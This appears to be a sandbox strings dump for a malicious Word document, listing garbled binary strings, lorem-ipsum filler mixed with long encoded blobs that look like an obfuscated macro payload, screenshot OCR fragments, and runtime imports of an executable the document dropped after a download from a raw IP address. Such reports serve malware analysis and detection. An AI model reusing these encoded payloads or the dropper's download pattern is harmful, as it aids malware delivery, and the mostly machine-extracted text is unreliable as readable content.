[F00000000][T01D36FBCA82ECAD0][O00000000]*C:\b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc

Unicode based on Runtime Data (WINWORD.EXE )

[Host Extender Info]

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

[MqB.ME(S"SS"6"(1Normal.ThisDocument

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

[NscrXPMFG)94@4wl`LZ3de-k)~1h4=imE"*W I."{:@BGx9.M#`5g12)UL"D22CQD5n6n/5od}9[0j&`d\l0}4:,Zvqv-`Q(;Qwrt"G<]A/t51mg;nf|.0X{"kfI!}q/x^.qdG2

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

[O,YM@1vRAy%`Xhl^NHFkbD2mCZg(:sYGNGb6Za>pF@K<>MQcz1$BC*Vi+1=xpPk+m*641%|Kd}u.qlT#i4rB1s6LGQt/XpMH

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

[Workspace]

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

\)GksRWWQoH{9]#qH+#Q#LVH{8PX@+

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

\*K-mum!l6``vO>GK:RjPk]}Kb2MZ$fzvp&@}"`qQ=d<r6i-#a]=uP*dEJ;Ha!>`%d

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

\+0ayUpt3a]uSxnaWZGUFz[B*g-\6J6o!</Gy<{Yha:?Nq71b!qen~Vn:52PkQTD\r'/.3S|?5

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

\>>0G$6BBWGG[7

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

\Gl4!XcQwWjjE6S64,(0>t&r#ewSXvGV&B\'SC3-;2M:QgG>3LCV:^?s!MlTuu\5h5k{_5cL[?KU|jy~2RE)FThQ@SS+5Zj(X/:9aZ,Ej}At(P.dY4:aBMND{3MYBm5XmiNk,\8;%#9 /NVAz*^Q$Zt&<&J(R!FK8MsPFN4}

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

\MSINFO32.EXE

Unicode based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

\x,"eJV8NX\uV

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

\z231Yb:/^Ce0,.*3`pimoH$f

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

] 8PhDDD3xTokYVxpfOnIfp4Zvf7XmSOm6XxxihIfZDAdQCHJv1oGyrxpO8Xke77jU4gBqhUp8W2XzJr0zBg5xg2heJsr3FTGldk6mCjipRRo37aXg7qpdnpHLv7aOD1Ca8o9hQvU11JS8oEffvcW1K2C0pdGNtL9qa9eRcEopZpxOJEwE5Y7lHxU90Zs6'O3mJR71aV1DGK5Rpk5mY7nIfxa5xkXypz2A36gHxtWuAUjDmGENdAFxxjlnKeTheT3d1HSJLPPU5zC1KDKzXgjvQhI7jZVCxFGFINlK8tN8mz3FGQrNGzgEJnAJnVfku0erBjF1TvLxbt8ZGKDrFy7qFtjdlk0wzJ5lYV7k86gtLHeQTKdC7vq8mYcvgauB7t6PmiY1E5B9YZAZiEs1baTOszxLladna0'lndawXX5ZqZ3trgHxxhpDhqX5i3E6PCJlVCnjeEmO672mLYfIGC8nkn6vPA8gSS1tsBy7Fafqgl5kbKOc6v83FSJxyyhX1sqtthBCFKgFyoYy'|76'~365'26'88'38' ' ' 'KNisi amet incididunt aliquip id do duis ullamco ea excepteur ad ullamco ut.jFugiat cillum qui ullamco esse deserunt duis aliqua incididunt ad. Irure velit ea ad commodo irure aliqua.'vi]0H`x 8PdkGTzwjKFHSPLzf4gDqXLp4z8KGm2Rmp3wNxQjksipAr0RULSYkgQRWAAUugUWLoGPS2w45vjRvRFWzSl0GHYckvWbHOYgFSRH5oj'hHyF7Rd7bjOQBaenYsLyDyDFnr3ERqFnVebocsuujLUxvzD1rUuCXW61NUnGD8hUJKIdEAI0HI186awy15pwTCh7sDkcPfHeG0pzBXs45'33'98'53'62';Amet laborum elit irure sint eiusmod laborum nostrud magna.'Dolore quis deserunt consequat laborum.Lorem velit incididunt amet mollit incididunt id. Quis reprehenderit nulla nostrud sit eu dolore ea enim magna ea cupidatat duis. '6Laboris proident fugiat id ut anim culpa et qui magna.WUt irure laboris proident incididunt id in reprehenderit et sint amet Lorem officia ex.kTempor ex reprehenderit adipisicing irure eiusmod mollit excepteur aliqua nisi est labore ipsum in nostrud. ' 'Tempor eu laborum adipisicing fugiat fugiat aliquip consequat. Eu deserunt qui laboris id veniam laborum ad ut pariatur nisi non nostrud amet eiusmod..Non culpa do eu laboris anim culpa dolor sunt. $V'NUtC3Q2yAInK7igzl167S9lmImPRmCZzuNSuXxVJzAkKUSZrUbddhOL75XoKqIJ5JjEaCZqUhdhWOxflQshatAqN54v5URODSlVbhTJCrpbFdjpvo6Fp0jKAdlniokhjhHuBjRIzxqv8XAqsW99Pc19HWcgP6Oo89JYBR5IFsjcw8UGRsRU9Pjv8CLc5aFRGTZtAlmzR3dLJLBRXpgtD0Z84jiXSbCyLFcKLkFRvQtR7Stltwpi5WlRCa9ZQzT44oX3cNjO3uj8liZPogqG3jYyxfcib9UasigdPary8RVYeJhewTNfCneirxIwf1Ur5Vs2IuY3UqGIPxij'MThAMTIxQDEyMkAzMkA3QDM4QDI5QDEyN0AxN0AyNEAxMEA2MUAxOEA1MEA5QDM0QDQyQDE5QDI1QDQ5QDE4QDI4QDI1QDYzQDQyQDI4QDEyN0A0NEA3QDEyMEAyNUA1MEAxOEAyOEAxMjZANDlAMTdAMzhAMjlANTBAMkAxMkAzNkA1MUAyQDEyQDM1QDEyM0A0N0AzQDEwQDEyNUA3QDUwQDExNUA1MUA0QDE1QDMwQDYyQDRAMTVAMTRANjJANkAzMUAxNEA0OUA3QDMzQDE0QDYwQDVAMzRAMTE0QDZANkA0OUA1QDZAMzFAMjhAMzZAMTIwQDdAMzhAMjlAMTI3QDE3QDI0QDEwQDM5QDI5QDE0QDI5QDVAMzBAOEAzMEA2MUA2QDI0QDEy' NkAzOUA0NkAxMkAzMEA0NEAxQDM4QDFANTlANDdAM0A1QDM1QDE3QDEyQDEyMkA1OUA0MUAzNEAxMEA2MUAxOEAxMjBAMUAzOUAxOEAxOUAyNUAzOUAyQDhAMTE0QDMyQDQxQDEyMEA0N0A2MkA0MUAxMkAxMTRAMzVAMTdAOEA5QDU4QDZAMzRAMTBAMzhAMThAMzhAMzlAMTIzQDQwQDEyMUAxM0AzMkA0MUAyOEAzOUA2MkAyQDhAMTE0QDM1QDE3QDEyQDI1QDM4QDQyQDI4QDUxQDM5QDJAMTJAMzZANTBAMkAxMkAzNUAxMjNANDdAM0AxMEAxMjVAN0A1MEAxMTVANTFANEAxNUAzMEA2MkA0QDE1QDE0QDYyQDZAMzFAMTRANDlAN0Az' M0AxNEA2MEA1QDM0QDExNEA1OUA0MUAzOEAyNUAzOUA0NkAzQDVAMzJAMTdAMzhANDdAMzhAMTdAM0A1QDM1QDE3QDM4QDI1QDM5QDE3QDM3QDVAMzJAMTdAOEAxMjZANjBANDJAM0AxMEA0NEAxQDI5QDI1QDEzQDMxQDI5QDEwQDM5QDdANDlAMTRANjJANDdAM0AzNUAxMjNAMkA4QDE3QDM0QDQyQDE5QDI1QDQ5QDE4QDI4QDI1QDYzQDQyQDI4QDEyN0A0NEA3QDEyMEA1QDM5QDQ3QDEyQDVAMTIyQDQwQDEyMEAyNUA2MUA0MUAyOEAzNUAzOUAxOEAyOEAyNUAzOUA0MEAzN0A2QDQ0QDQyQDMzQDJANDRAMjlAMTlANUAzOUA0MEAz' NEAxMjJAOUAxN0AxMjFAMjlANjJANDdAMTVANTlANUA0MUAxMjBANTlANTlANDFAMTJANTFAMzVAN0A0OUAyNkA2MkA2QDhAMTBAMzhAMThAMzhAMzlAMTIzQDQwQDEyMUAxM0AzMkA0MUAyOEAzOUA2MkAyQDhAMTE0QDUwQDE3QDE5QDVAMTIyQDQxQDI4QDMwQDQ0QDQyQDMzQDJANDRAMUAzOEAxQDU5QDQ3QDNANUAzNUAxN0AxMkAxMjJANTlANDFAMzRAMTBANjFAMThAMTIxQDExNEA2M0A0MEAxMkA1MUAzOUA0N0AxMkAzMEA0NEA0MkAzM0AyQDQ0QDFAMzRAMThANDRANDBAMTIwQDI1QDM1QDQwQDM3QDI2QDQ0QDFAMjlAMjVA' DMTNAMzFAMjlAMTBAMzlAN0A0OUAxNEA2MkAxN0AxOUAzNUAzOUA0NkAzQDM1QDEyNw==' $'Officia sint consequat nulla do duis pariatur sint duis nulla adipisicing laboris dolor. Laborum duis exercitation voluptate voluptate.YConsequat amet ea amet excepteur nostrud sunt est sit anim id quis commodo ea incididunt.VTempor consectetur occaecat eu ipsum dolor veniam sit duis adipisicing duis sit et id.mDolor aliqua ut nisi veniam qui elit. Nostrud do laborum eiusmod duis magna fugiat sit fugiat Lorem occaecat.Anim ad cillum et dolore et pariatur ut elit commodo dolor voluptate laborum. Enim veniam pariatur cupidatat id esse est quis dolore nulla fugiat officia voluptate ea anim. $$'[Esse ea ipsum nulla aute nostrud aute eiusmod aliquip id. Magna duis exercitation do et id.VEst incididunt consequat nostrud eiusmod laborum esse minim eu deserunt duis deserunt.Reprehenderit et dolore veniam ea cupidatat sint incididunt aute consectetur velit dolore laboris elit. Dolore elit fugiat id do. $$\' 'KFugiat labore incididunt velit esse consectetur sunt Lorem dolor enim sunt. ' $'8Eiusmod anim culpa amet est reprehenderit sit consequat. $T' $Z'$Do duis ullamco aute ullamco fugiat.vOccaecat tempor id qui reprehenderit Lorem duis veniam ipsum laboris quis laborum duis. Quis do in anim nostrud irure.%Eiusmod sint esse qui laboris sit ad. @$'Officia aliquip dolore dolor culpa nulla anim incididunt consequat voluptate ipsum. Magna in ex mollit laborum voluptate qui qui id consectetur enim elit exercitation minim nulla. ' 'OConsectetur magna ullamco culpa nostrud commodo occaecat quis aliquip proident. < <$ ' $X ' < ' $\'7Elit voluptate et ullamco amet pariatur aliquip mollit. $z'[Voluptate nisi ullamco aliqua mollit et cillum excepteur officia deserunt proident elit id. 'Consequat officia cillum tempor velit excepteur aliquip reprehenderit dolore ad deserunt. Culpa dolore culpa deserunt labore magna excepteur mollit mollit veniam fugiat non esse magna. ' ' $T' '"Sint ut enim est occaecat et esse.Aliquip incididunt ullamco aliqua nostrud proident laborum eiusmod ad commodo irure. Dolor est ea excepteur est non ipsum sunt laboris et. ' ' '@Cupidatat irure cupidatat sunt commodo veniam do consectetur ut. $$'Sint et minim ipsum sint nisi ad Lorem cillum quis officia cupidatat. Mollit nulla ut aliqua dolore ex laboris occaecat excepteur sit occaecat commodo. ' '5Tempor do ut adipisicing duis quis do ipsum deserunt. ' ' $z'<Sint aliqua velit sunt exercitation duis occaecat consequat. ' 'g$@'Est Lorem qui cupidatat velit. Lorem quis enim non esse fugiat.0'NMinim adipisicing mollit ullamco aliqua enim nulla dolore ullamco irure irure. 'JEnim qui culpa deserunt magna. Sunt ullamco incididunt sint laboris velit.QIrure Lorem aliquip ea magna irure est. Ullamco est magna duis irure consectetur. ' ' 'Culpa ad irure aliqua reprehenderit enim exercitation ipsum exercitation tempor adipisicing mollit cupidatat. Ad sunt voluptate cillum tempor incididunt commodo sunt ea aliqua irure velit do minim aliquip.|Aute ullamco elit nostrud magna cillum voluptate irure esse mollit incididunt dolor velit non. Consequat veniam ut amet est. '@Incididunt minim ullamco dolore duis non exercitation consequat.Nulla ut eiusmod amet deserunt ut sunt est esse ullamco magna. Proident non eiusmod anim labore proident laboris minim ea anim enim culpa.sIncididunt velit ad id deserunt. Ipsum laborum laboris amet adipisicing ipsum velit anim dolore dolore culpa irure.,Aliquip sunt ad ex sunt aute tempor do amet.LConsequat non ex sint enim duis tempor nisi est anim excepteur occaecat qui.jEx officia laboris enim anim ex fugiat ipsum. Magna ipsum nisi nulla aute aute id enim irure et elit quis.VEx fugiat fugiat elit pariatur eu laboris laboris ut laboris magna dolore adipisicing. 'dAdipisicing et nostrud excepteur est voluptate non. Dolore id ipsum laborum magna elit aliquip quis.Sunt in consequat dolor exercitation mollit aliquip Lorem est sint consectetur sunt. Aute labore exercitation commodo incididunt incididunt velit culpa enim laboris qui non sint occaecat non. 'SMinim exercitation culpa laborum ex id. Aliquip exercitation ex laborum ipsum anim. 'ih]0H`xHV29fCUC1YatOjF9SVlkFdXokxfcKf9axvix8QEZZNSEnQD3marcfNJHpp73VSj9BkUiL75ZhNl4KYPb2Lo3a1IUA7devkK2sSoJAsYWQeqSs81kjjZZni7jyg9wTSgkLxxQW8zVwxwKYbvFOivPkWSm3518d2YAyEc37r46OBxrKDfFWHZcEwIgFq5dh7rggZDsi0qSNwYliTDntOpbiF7DZjHWUk4gKFBFB6EFX5a6FcKIR60yxrJCQhsvZkTkJ3g0J3OVAPgwjByViGvOFxESXitzLz1isyVQt758Si2yBmJcogorwm4SWSEecbNj6n9rb5CIg'CWJ9vAgSyr52WbXtI278AXLk3RPATJ6AkNVnIp8AymgG4EDXh5AhgZz9hAFP87xAuovrxr8NkDuvOST0Ldu9JjlDuFcANaP183a8rdUuTBOUtwm6A9XGrYvtDX7x5bhpirPaSl8aSWFv24fk1K5hJlEj2TIpNjXfyKWVpdxRQ7hcsfVLTDY6CGSg3sG4tIm90NB1XovSxBa6C8gcgtq6GDWkL'Jhlk3JfDkGkvuoiSJQuIiYhXTW94X6xzKhFkuHhF7Kem2PzLbQABDIFPAlmGb6Gr7Dlur28AmYhEg0Q2onfbasnrwJmm4LSJSrwhSqdI7LtcSj6SOUV8qOXQLesefEk'91'27'50'31'60' ' 'DVeniam culpa tempor duis laborum cillum aute excepteur mollit culpa. '{Consequat in velit nostrud sit commodo ut enim. Fugiat laborum do veniam reprehenderit consectetur ullamco et nisi in quis.]Exercitation aute anim in pariatur veniam laboris quis. Labore est officia id voluptate nisi fugiat reprehenderit cupidatat quis aute. 'Magna elit reprehenderit cillum et nulla eiusmod eiusmod. Magna eiusmod dolore amet laboris pariatur sunt anim reprehenderit anim qui fugiat.@ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/']] $' 'ZAd sit anim magna nulla. Ipsum magna id aliqua est culpa excepteur officia et dolor et et. ' ']] 8Ph]Fugiat labore do elit eu. $z'?Nisi quis est ea eu culpa eiusmod reprehenderit cupidatat nisi.

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

])=mE_<L/lS3ZRN$piEmjX3_lI%T^H<

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

]C=Q!{G9Q{&e4Lm8Vh$5@12h'xxN|~35$EFny27{2Zu

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

]mU?QW_jW8U5V.kL7c+w8W\5

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

]Q<HMVJ(Cx"

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

]rNsIqZey^[>Z-Y3E{^X.}=.KdEjEGQou8PSs^^WvTj9aD-5J"/'kFDU=VL;8SS1<L|jKqIcGG0nY;h4KGl;Mstq+ox!5E]ESTWp&Wzp2LM0pM:-a^jhsYU

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

]SWS[Unzh[q'_wQ.5Mkc,k.5$X`rJDw/aQukW<WDj>7'U\t\_<:za8z<]'_uO5EjVPdXJ+@c#ZUo<|l7g_mg?8\;tpXDcNXy'gO='4lN2.4%g"1*[\>"%&c)L2fl5NQD!

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

^`@1jf2(orH*DS$d}ou2

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

^p t3~W{|cWuy/uZl:@Ww]7rkiQ'

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

^PM :.nvCtX,jI

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

^z-<=>@F#BCxuWLK0\N(#TO/o`rGC^EZi3{"ET#rWaWL9ki,J()]G,{"&|$TaAE<c8i6#XT2UXq+|{pUvTJ=

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

_)#E1(yU,},w9,`mJ1Q1fA),!Bn

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

_644_8n3_tlci_llda6a_eda9isadss7ltdl6c7_as8aaaaa47al6_7

Ansi based on Image Processing (screen_5.png)

_?_?_?M_L_

Ansi based on Image Processing (screen_9.png)

_?m?J?____q_?,,?,??m??_?_v__,,,_,,

Ansi based on Image Processing (screen_9.png)

_@"o=o`a,gqi+C9Z.=aj-Se`pg^lw]"F{T

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

__?J?_?_m_?_____m??mu?___?_______

Ansi based on Image Processing (screen_0.png)

___?_________

Ansi based on Image Processing (screen_0.png)

_______?Jm_L_

Ansi based on Image Processing (screen_0.png)

__V________

Ansi based on Image Processing (screen_0.png)

__vbaAryConstruct2

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaAryCopy

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaAryDestruct

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaAryLock

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaAryMove

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaAryUnlock

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaChkstk

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaDateVar

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaErrorOverflow

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaExceptHandler

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaExitProc

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaFPException

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaFreeObj

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaFreeObjList

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaFreeStr

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaFreeStrList

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaFreeVar

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaFreeVarList

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaGenerateBoundsError

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaHresultCheckObj

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaI2Var

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaI4Var

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaInStrVar

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaLenBstr

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaLenBstrB

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaNew2

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaObjSet

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaObjSetAddref

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaOnError

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaR8Var

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaRedim

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaRedimPreserve

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaSetSystemError

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaStrCat

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaStrCmp

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaStrCopy

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaStrI2

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaStrMove

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaStrToAnsi

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaStrToUnicode

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaStrVarMove

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaStrVarVal

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaUbound

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaUI1I2

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaUI1Var

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaVar2Vec

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaVarAdd

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaVarAnd

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaVarCopy

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaVarDiv

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaVarDup

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaVarForInit

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaVarForNext

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaVarInt

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaVarMod

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaVarMove

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaVarMul

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaVarSub

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

__vbaVarTstGe

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

_adj_fdiv_m16i

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

_adj_fdiv_m32

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

_adj_fdiv_m32i

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

_adj_fdiv_m64

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

_adj_fdiv_r

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

_adj_fdivr_m16i

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

_adj_fdivr_m32

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

_adj_fdivr_m32i

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

_adj_fdivr_m64

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

_adj_fpatan

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

_adj_fprem

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

_adj_fprem1

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

_adj_fptan

Ansi based on Dropped File (urlref_http185.81.113.106L33LMj7.exe.1512661307692)

_B!.9$!~V_7s_:}

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

_bRLRcsw0"Xd>$

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

_c-[/c{W-qz#\ca^[%yk/\WC^ZcZj|.a{V?C\9_~id

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

_c0mpat_b____m0de_

Ansi based on Image Processing (screen_5.png)

_dV`%?=l}'zUZ6|t}18%BCXZ&Wr-EfypI\O1cJ','VM)dPxMEs.rc\V%"[C++TQh"C9p@J@ u&

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

_I= "EgZKyNWnCPmGF9QUWtnsjpaO96BrRkRifJicfZzfnL2jBX3A0Vt1r1ZFRzTRSns0V8HpvYYE3F9trjomUzT1djxO1SbWFNg349CvHmoOifF3NCWREkZ85SXR7umpdBgPZKQQXDVh4HQBXxJVUCERoleJRbIBhD6pzX5J2h8eyatF5QzuuK1AnpJv9iw5K5H3gLn7sgC1AooZdIvOOigWbqswUCCC3rKdYdoLDBvhAgtQ8l85AlSfSBHCcII6pbaeICyRVhPZZ3FLQJwePyjiKuXSkj7NZXR8nusLIuK5ufHbQ1dFW80X7VyV8ZXEe0iGHZ0JErHa2pzkI8k8RJLzK7jT2Xeagk"`-@`-bLNvyNY2cc1ahUXBInXeePR5PxJmPikDpOrmy91d0cAjgBWo3FZ4uhvY4wn2ZQCn3UGKkkjqRc3oIi8fKDhgYSPscXeOdyW2bxJoevWeQyJp1FFC889 ukDVyoViRhW4qlHtDpPvOzyczQj4sisuRNBQ7SugnDBGRq0mosvWHfXmegc9RQFygzG6PmHi94Ow3aaUwhsaFcBC7pWR5DVg1lpTX4XIbwNy8Q7XnbH5Vytj41avGbbGrQSHS2qISQmETHf7PxvGJ1ONpaVuffxmqH0S2jjTurEEgUKEjViyOmd8RxCY0WUHPrbAKQjtvVRmoQTCmuh7WKPvP7bhSBIXLUeepgrwoCve0w0mix14HWkd25dDLsHUAoTylma1UtHxxdNEJ78ltQQGgc6a5rxitq6pZtfYBoTlYuZ3ZHAOBm67PzsT0dinL7YGdgglueNslcQsir7C6Q5YFeFwN5bCyb20KtHAgVm9WRtT2okJpdIa4uFLmwz2etdfsER0friGemY3lLD5YQB8Ns7RJXxpU0esKKs7qsBXjIFNUNNRb8$36=

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

_nessaee,

Ansi based on Image Processing (screen_5.png)

_s1_dq[9$TyKn5XV<HaHIQHH.k.GX,5<5cdW;F`=5:HQfTX W_)5*Ozd/}^s3w^kn*s

Ansi based on Hybrid Analysis (b4644e58f13e1f2cf0c912da6ae2eda9850d5572fd16c7e4a58aaaaa47a26e17.doc.bin)

_s__t__s___ct_

Ansi based on Image Processing (screen_5.png)

_Vc6qd ^6iwu;9?5vr?g8#KA"<r#M0D*|?gV<8E1:DN:'\y}7U}]pU^/og=<8.9E]p^_||<QT^:c_|}8^=a1i7F,U79xwEG(nDn:tD&wS|x~Qw{8~^<~ar|t{>k%TQz*E_qvT'3{}g~kN=<:~=x\~tc$

